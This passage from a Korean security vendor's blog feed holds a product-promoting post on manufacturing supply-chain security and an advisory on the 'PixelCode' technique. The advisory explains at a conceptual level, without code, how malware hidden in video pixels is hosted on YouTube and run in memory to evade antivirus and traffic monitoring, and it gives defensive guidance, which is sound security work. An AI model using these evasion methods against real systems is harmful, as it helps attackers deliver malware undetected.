&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;제조업 환경에서 공급망 보안을 강화하기 위해서는 다음과 같은 관점의 점검이 필요합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;☑︎&lt;b&gt;&amp;nbsp;협력사&amp;middot;외주 인력과 공유되는&lt;/b&gt; &lt;u&gt;&lt;b&gt;기술 문서&amp;middot;설계 자산의 개인 PC 및 외부 저장매체 분산 여부&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;☑︎&amp;nbsp;&lt;b&gt;외부 반출 과정에서의&lt;/b&gt; &lt;u&gt;&lt;b&gt;승인&amp;middot;이력 관리 및 다운로드 통제 체계&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;☑︎&amp;nbsp;&lt;b&gt;랜섬웨어 감염 또는 내부자 실수 발생 시&lt;/b&gt; &lt;u&gt;&lt;b&gt;중앙 복구 가능 구조 및 대응 체계&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;☑︎&amp;nbsp;&lt;b&gt;협력사&amp;middot;프로젝트 단위의&lt;/b&gt; &lt;u&gt;&lt;b&gt;접근 권한 분리 및 관리 수준&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;특히 글로벌 제조 공급망을 운영하는 기업일수록, 보안의 기준은 &amp;lsquo;내부 직원&amp;rsquo;이 아니라 협력사까지 포함한 전체 업무 흐름을 기준으로 설계돼야 합니다. 공급망 보안이 취약한 상태에서는 아무리 강력한 내부 보안 솔루션을 갖추고 있어도, 이번 사례처럼 핵심 기술 자산이 한 번에 노출될 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이제 제조업 보안의 핵심 질문은 명확합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;span style=&quot;color: #1b711d;&quot;&gt;&lt;b&gt;우리 회사의 기술 자산은, 협력사 환경에서도 동일한 수준으로 보호되고 있는가?&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #333333; text-align: start;&quot;&gt;이 질문에 확신 있게 답할 수 있을 때, 비로소 공급망 리스크로부터 자유로워질 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt; &lt;span style=&quot;color: #006dd7;&quot;&gt; Tip!&lt;/span&gt; 제조업 공급망 보안, 이렇게 시작할 수 있습니다&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;제조업 환경에서 공급망 보안을 실질적으로 강화하려면, 공격 유형별 개별 대응이 아니라 기업 핵심 자산을 보호하는 구조와 랜섬웨어 확산을 차단하는 대응 체계를 함께 고려해야 합니다. 이스트시큐리티는 제조업의 협업 구조와 공급망 리스크를 반영해 다음과 같은 보안 대응 방향을 제안합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://www.estsecurity.com/enterprise/solution/data-protection&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&lt;b&gt;기업자산 보호 솔루션&lt;/b&gt;&lt;/a&gt;은 설계도, 도면, 기술 문서 등 제조업의 핵심 자산을 중앙에서 통제&amp;middot;관리함으로써, 협력사&amp;middot;외주 인력&amp;middot;프로젝트 단위 협업 과정에서 발생할 수 있는 정보 유출 위험을 구조적으로 줄이는 데 초점을 둡니다. 개인 PC나 외부 저장매체에 자산이 분산되는 환경을 최소화해, 공급망을 통한 기술 유출 가능성을 근본적으로 낮출 수 있습니다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384088.png&quot; data-origin-width=&quot;2532&quot; data-origin-height=&quot;880&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dVFMsI/dJMcai9WpqY/8lkn0UdMZ7vlmTCvRIjmA1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dVFMsI/dJMcai9WpqY/8lkn0UdMZ7vlmTCvRIjmA1/img.png&quot; data-alt=&quot;이스트시큐리티 데이터 보안 시나리오&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dVFMsI/dJMcai9WpqY/8lkn0UdMZ7vlmTCvRIjmA1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdVFMsI%2FdJMcai9WpqY%2F8lkn0UdMZ7vlmTCvRIjmA1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;2532&quot; height=&quot;880&quot; data-filename=&quot;Group 2034384088.png&quot; data-origin-width=&quot;2532&quot; data-origin-height=&quot;880&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;이스트시큐리티 데이터 보안 시나리오&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;&lt;a href=&quot;https://www.estsecurity.com/enterprise/solution/ransomware&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;랜섬웨어 대응 솔루션&lt;/a&gt;&lt;/b&gt;은 제조 공급망을 경유해 유입될 수 있는 랜섬웨어 공격을 사전에 탐지하고, 감염이 발생하더라도 피해 확산과 업무 중단을 최소화할 수 있도록 설계된 대응 체계를 제공합니다. 이는 협력사 보안 침해 이후 전사적 시스템 마비로 이어지는 최악의 시나리오를 방지하는 핵심적인 방어 수단입니다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;  이스트시큐리티의 랜섬웨어 대응, 무엇이 다른가요?&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: circle;&quot; data-ke-list-type=&quot;circle&quot;&gt;
&lt;li&gt;백신 기술력 및 10년 이상의 엔드포인트 보안 운영 노하우를 통한 가시성 제공&lt;/li&gt;
&lt;li&gt;랜섬웨어 분석 전문 인력 ESRC의 인텔리전스를 기반으로한 신속한 대응&lt;/li&gt;
&lt;li&gt;신/변종 랜섬웨어 분류에 특화된 Threat Inside의 Deep Core 엔진&lt;/li&gt;
&lt;li&gt;랜섬웨어 공격 대상인 문서에 대한 보안 솔루션, 파일관리시스템 기술 보유&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;제조업 공급망 보안의 핵심은 &amp;lsquo;무엇을 지킬 것인가&amp;rsquo;와 &amp;lsquo;침해 발생 시 어떻게 확산을 막을 것인가&amp;rsquo;에 대한 명확한 기준을 세우는 것입니다. 기업자산 보호와 랜섬웨어 대응이 함께 작동할 때, 복잡한 협업 환경에서도 핵심 기술 자산과 업무 연속성을 동시에 확보할 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;제조업 공급망 환경에 맞는 보안 체계가 필요한지, 현재 운영 중인 협업&amp;middot;자산 관리 구조에 어떤 보완이 필요한지 점검이 필요하다면, 이스트시큐리티의 공급망 보안 컨설팅을 통해 귀사 환경에 적합한 대응 방향을 확인해보시기 바랍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 485151 (2).png&quot; data-origin-width=&quot;647&quot; data-origin-height=&quot;212&quot;&gt;&lt;a href=&quot;https://bit.ly/4nsdIJE&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cacHpB/dJMcadnhqun/RR9yfMw2A93wHXmsusin91/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcacHpB%2FdJMcadnhqun%2FRR9yfMw2A93wHXmsusin91%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;250&quot; height=&quot;82&quot; data-filename=&quot;Group 485151 (2).png&quot; data-origin-width=&quot;647&quot; data-origin-height=&quot;212&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #666666;&quot;&gt;&lt;b&gt;[참고 출처]&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;a href=&quot;https://www.cpomagazine.com/cyber-security/data-breach-at-manufacturing-firm-luxshare-leaks-sensitive-files-from-apple-nvidia-tesla-and-others/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;Data Breach at Manufacturing Firm Luxshare Leaks Sensitive Files from Apple, Nvidia, Tesla, and Others&lt;/a&gt; &amp;ndash; CPO Magazine&lt;/span&gt;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5710</guid>
      <comments>https://alyacofficialblog.tistory.com/5710#entry5710comment</comments>
      <pubDate>Thu, 29 Jan 2026 15:40:18 +0900</pubDate>
    </item>
    <item>
      <title>영상 픽셀 속 악성코드, '픽셀코드(PixelCode)' 공격기법</title>
      <link>https://alyacofficialblog.tistory.com/5709</link>
      <description>&lt;div class=&quot;pixel-code-post&quot; style=&quot;line-height: 1.8; font-family: 'Noto Sans KR', sans-serif; color: #333; max-width: 900px; margin: 0 auto;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;916&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/OG4UP/dJMcachDnl3/IlvwxsV5NzOfWEEndDghw0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/OG4UP/dJMcachDnl3/IlvwxsV5NzOfWEEndDghw0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/OG4UP/dJMcachDnl3/IlvwxsV5NzOfWEEndDghw0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FOG4UP%2FdJMcachDnl3%2FIlvwxsV5NzOfWEEndDghw0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1280&quot; height=&quot;916&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;916&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;

&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최근 멀티미디어 파일의 픽셀(Pixel) 데이터를 악성 페이로드 저장소로 활용하는 이른바 &lt;b&gt;&amp;lsquo;픽셀코드(PixelCode)&amp;rsquo;&lt;/b&gt; 공격 기법이 등장하여 주의가 필요합니다. 이는 스테가노그래피(Steganography) 기술을 고도화하여 보안 솔루션의 탐지망을 정교하게 우회하는 방식입니다.&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 4px solid #343a40; padding: 15px 20px; margin: 25px 0;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;픽셀코드(PixelCode) 정의&lt;/p&gt;
&lt;p style=&quot;margin: 5px 0 0; color: #495057;&quot; data-ke-size=&quot;size16&quot;&gt;바이너리 데이터를 사람이 인식하는 색상 정보(픽셀)로 변환하여 이미지나 영상 속에 삽입하는 기술입니다. 외형상 일반 미디어 파일과 구분이 어려운 것이 특징입니다.&lt;/p&gt;
&lt;/div&gt;
&lt;hr style=&quot;border: 0; height: 1px; background: #eee; margin: 30px 0;&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;픽셀코드 공격 시나리오 및 매커니즘&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격자는 신뢰 기반의 플랫폼과 파일리스(Fileless) 실행 기법을 결합하여 다음과 같은 다단계 프로세스를 수행합니다.&lt;/p&gt;
&lt;div style=&quot;margin: 35px 0; text-align: center;&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;833&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bNvtss/dJMcahQMuiI/K5DEAq1lKtpKtIj1XaV331/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bNvtss/dJMcahQMuiI/K5DEAq1lKtpKtIj1XaV331/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bNvtss/dJMcahQMuiI/K5DEAq1lKtpKtIj1XaV331/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbNvtss%2FdJMcahQMuiI%2FK5DEAq1lKtpKtIj1XaV331%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1000&quot; height=&quot;833&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;833&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;

&lt;p style=&quot;color: #888; font-size: 0.85em; margin-top: 10px;&quot; data-ke-size=&quot;size16&quot;&gt;픽셀코드 공격 흐름도 (이미지 출처: Malicious PixelCode 프로젝트)&lt;/p&gt;
&lt;/div&gt;
&lt;div style=&quot;border: 1px solid #e9ecef; border-radius: 8px; overflow: hidden; margin: 25px 0;&quot;&gt;
&lt;table style=&quot;width: 100%; border-collapse: collapse; background-color: #fff;&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;thead&gt;
&lt;tr style=&quot;background-color: #f8f9fa; border-bottom: 2px solid #dee2e6;&quot;&gt;
&lt;th style=&quot;padding: 12px; text-align: center; width: 25%; font-weight: 600;&quot;&gt;단계&lt;/th&gt;
&lt;th style=&quot;padding: 12px; text-align: left; font-weight: 600;&quot;&gt;상세 내용&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr style=&quot;border-bottom: 1px solid #eee;&quot;&gt;
&lt;td style=&quot;padding: 18px; text-align: center; font-weight: bold; color: #495057;&quot;&gt;1. Payload Preparation&lt;/td&gt;
&lt;td style=&quot;padding: 18px; line-height: 1.6;&quot;&gt;C++ 기반 악성 EXE를 &lt;b&gt;픽셀 단위 데이터로 인코딩&lt;/b&gt;하여 정상적인 MP4 영상 파일로 생성합니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #eee;&quot;&gt;
&lt;td style=&quot;padding: 18px; text-align: center; font-weight: bold; color: #495057;&quot;&gt;2. Staging &amp;amp; Hosting&lt;/td&gt;
&lt;td style=&quot;padding: 18px; line-height: 1.6;&quot;&gt;유튜브(YouTube) 등 &lt;b&gt;합법적인 플랫폼&lt;/b&gt;에 영상을 업로드하여 네트워크 보안 장비의 탐지를 우회하고, 영상에서 데이터를 추출할 '스테이저'를 포함한 최종 배포용 &lt;b&gt;'로더(Loader)'&lt;/b&gt;를 제작합니다.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;padding: 18px; text-align: center; font-weight: bold; color: #495057;&quot;&gt;3. Infection &amp;amp; Execution&lt;/td&gt;
&lt;td style=&quot;padding: 18px; line-height: 1.6;&quot;&gt;감염된 PC에서 로더가 영상을 다운로드 후, &lt;b&gt;메모리 상에서 픽셀을 바이너리로 복원&lt;/b&gt;하여 실행합니다. (C2 서버 연결)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;hr style=&quot;border: 0; height: 1px; background: #eee; margin: 30px 0;&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;주요 위협 요인 및 분석 회피 기술&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;ul style=&quot;list-style-type: none; padding-left: 0;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li style=&quot;margin-bottom: 15px; padding-left: 20px; border-left: 3px solid #dee2e6;&quot;&gt;&lt;b&gt;비실행 포맷(Non-executable) 활용:&lt;/b&gt; 백신이 MP4 파일을 스캔할 때 픽셀 값에 분산된 데이터는 명확한 코드 구조나 시그니처가 존재하지 않아 정적 분석 단계에서 식별이 어렵습니다.&lt;/li&gt;
&lt;li style=&quot;margin-bottom: 15px; padding-left: 20px; border-left: 3px solid #dee2e6;&quot;&gt;&lt;b&gt;정상 트래픽 위장:&lt;/b&gt; 대형 스트리밍 도메인과의 통신은 기업 보안 환경에서 기본 허용되어 있어 트래픽 분석을 우회합니다.&lt;/li&gt;
&lt;li style=&quot;margin-bottom: 15px; padding-left: 20px; border-left: 3px solid #dee2e6;&quot;&gt;&lt;b&gt;파일리스(Fileless) 및 프로세스 인젝션:&lt;/b&gt; 디스크 쓰기 없이 메모리 상에서 직접 동작하여 흔적을 최소화하며, 정상 프로세스에 인젝션되어 동작될 경우 보안 솔루션이 정상 행위로 오인할 수 있습니다.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr style=&quot;border: 0; height: 1px; background: #eee; margin: 30px 0;&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;대응 전략 및 보안 권고 사항&lt;/span&gt;&lt;/b&gt;&lt;/h3&gt;
&lt;div style=&quot;display: flex; flex-direction: column; gap: 20px; margin-top: 20px;&quot;&gt;
&lt;div style=&quot;border: 1px solid #dae0e5; padding: 20px; border-radius: 8px; background-color: #fff;&quot;&gt;
&lt;p style=&quot;margin-top: 0; font-weight: bold; font-size: 1.1em; color: #2c3e50;&quot; data-ke-size=&quot;size16&quot;&gt;개인 사용자 가이드&lt;/p&gt;
&lt;ul style=&quot;padding-left: 18px; font-size: 0.95em; color: #555;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;출처 불분명한 영상 다운로드, 코덱 설치 요구 주의&lt;/li&gt;
&lt;li&gt;공식 플랫폼 외의 영상 다운로드 도구 사용 지양&lt;/li&gt;
&lt;li&gt;OS 및 엔드포인트 보안 엔진 최신 버전 유지&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style=&quot;border: 1px solid #dae0e5; padding: 20px; border-radius: 8px; background-color: #fff;&quot;&gt;
&lt;p style=&quot;margin-top: 0; font-weight: bold; font-size: 1.1em; color: #2c3e50;&quot; data-ke-size=&quot;size16&quot;&gt;기업 보안 관리자 가이드&lt;/p&gt;
&lt;ul style=&quot;padding-left: 18px; font-size: 0.95em; color: #555;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;CDR(Content Disarm &amp;amp; Reconstruction) 기술 검토&lt;/li&gt;
&lt;li&gt;특정 프로세스의 비정상적인 외부 통신(EDR/XDR) 모니터링&lt;/li&gt;
&lt;li&gt;제로 트러스트 기반의 콘텐츠 검증 체계 강화&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번 픽셀코드 공격 사례에서 알수 있듯&lt;span&gt;, &lt;/span&gt;공격자는 더 이상 시스템 취약점만을 노리지 않고 &lt;span&gt;&amp;lsquo;&lt;/span&gt;이미지나 영상 파일은 비교적 안전하다&lt;span&gt;&amp;rsquo;&lt;/span&gt;는 사용자의 인식을 악용하고 있습니다&lt;span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;이러한 스테가노그래피 기반 위협에 대응하기 위해서는 출처가 불분명한 파일을 의심하고&lt;span&gt;, &lt;/span&gt;모든 디지털 콘텐츠를 검증 대상으로 바라보는 기본적인 보안 습관이 무엇보다 중요합니다&lt;span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/UOjGH/dJMcaaxmHnR/0JnEimsieRiTxxB0dsResK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/UOjGH/dJMcaaxmHnR/0JnEimsieRiTxxB0dsResK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/UOjGH/dJMcaaxmHnR/0JnEimsieRiTxxB0dsResK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FUOjGH%2FdJMcaaxmHnR%2F0JnEimsieRiTxxB0dsResK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #9d9d9d;&quot;&gt;&lt;b&gt;[참고]&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #9d9d9d;&quot;&gt;&lt;a style=&quot;color: #9d9d9d;&quot; href=&quot;https://github.com/S3N4T0R-0X0/Malicious-PixelCode/blob/main/README.md&quot;&gt;https://github.com/S3N4T0R-0X0/Malicious-PixelCode/blob/main/README.md&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;</description>
      <category>국내외 보안동향</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5709</guid>
      <comments>https://alyacofficialblog.tistory.com/5709#entry5709comment</comments>
      <pubDate>Thu, 29 Jan 2026 11:02:24 +0900</pubDate>
    </item>
    <item>
      <title>MS, Office 제로데이 취약점 긴급 패치</title>
      <link>https://alyacofficialblog.tistory.com/5707</link>
